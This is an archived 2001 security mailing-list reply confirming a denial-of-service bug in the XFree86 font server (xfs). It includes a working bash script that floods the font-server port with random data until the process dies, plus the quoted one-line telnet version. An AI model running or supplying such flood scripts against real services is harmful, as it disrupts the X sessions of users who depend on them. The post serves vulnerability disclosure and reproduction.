Re:XFree86-xfs-4.0.1-1 DoS

From: Mathias Dybvik (tmdybvikat_private)
Date: Sun Jun 10 2001 - 00:16:42 PDT

Next message: Thomas Corriher: "RE: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival"

Previous message: Alfred Huger: "Win2k Permissions bug (fwd)"
Maybe in reply to: Jarosław Zachwieja: "XFree86-xfs-4.0.1-1 DoS"
Next in thread: Mathias Dybvik: "Re:XFree86-xfs-4.0.1-1 DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Confirmed, on Mandrake 8.0.

I should, however, point out that I was only able to take down the 
font-server as a local user, and not from a remote host. This could be a 
bandwidth problem, caused by the fact that I only have a measly 10Mb/s 
LAN.
Then again, my urandom bandwidth is less than half of that, so I'm not 
sure what gives...

The moral of the story is that (at least) any local user can kill the xfs 
process. This has dire consequences for any user either using X on that box, 
or using an x-terminal relying on that fontserver.

[user@userland ~]$ ps -ax|grep xfs
9363 ?        S      0:00 xfs -port 7100 -daemon -user xfs
9574 pts/1    S      0:00 grep xfs

[user@userland ~]$./xfkill

[user@userland ~]$ ps -ax|grep xfs
9626 pts/1    S      0:00 grep xfs

$cat xfkill
[user@userland ~]$ cat xfkill
#!/bin/bash
XFSPORT=7100
XFS_IP=192.168.1.254
for ((COUNT=0;COUNT<500;COUNT=$COUNT+1)) do
echo sending garbage to $XFSPORT pass $COUNT
telnet $XFS_IP $XFSPORT </dev/urandom &>/dev/null
done

Version information:
$ rpm -qi XFree86-xfs
Name        : XFree86-xfs                  Relocations: (not relocateable)
Version     : 4.0.3                             Vendor: MandrakeSoft
Release     : 7mdk                          Build Date: Sun 08 Apr 2001 08
Install date: Mon 23 Apr 2001 09:32:49 PM UTC      Build Host: bi.mandrake
Group       : System/Servers                Source RPM: XFree86-4.0.3-7mdk
Size        : 536213                           License: MIT
Summary     : Font server for XFree86


>>>>>>>>>>>>>>>>>>Original Message <<<<<<<<<<<<<<<<<<

On 6/6/01, 2:31:49 PM, =?iso-8859-2?q?Jaros=B3aw=20Zachwieja?= <grokat_private> 
wrote regarding XFree86-xfs-4.0.1-1 DoS:


>Hello,

>xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0 seems to
>suffer from a Denial of Service attack.
>To cause xfs to stop responding for requests, try to do the fillowing:

>$ telnet victim xfs </dev/urandom

>Repeat about 100 (or 1000) times and you get Connection refused message.

>Regular Xservers can no longer connect, usually crash stating Could not 
>open
>default font 'fixed' and probably get disabled for 5 minutes if run from
>inittab.

>I'd appreciate any succesfull/unsuccesfull attemps of reproducing this
>behaviour.

>Regards,
>--
>Valentine M. Smith
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Next message: Thomas Corriher: "RE: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival"
Previous message: Alfred Huger: "Win2k Permissions bug (fwd)"
Maybe in reply to: Jarosław Zachwieja: "XFree86-xfs-4.0.1-1 DoS"
Next in thread: Mathias Dybvik: "Re:XFree86-xfs-4.0.1-1 DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jun 10 2001 - 17:18:23 PDT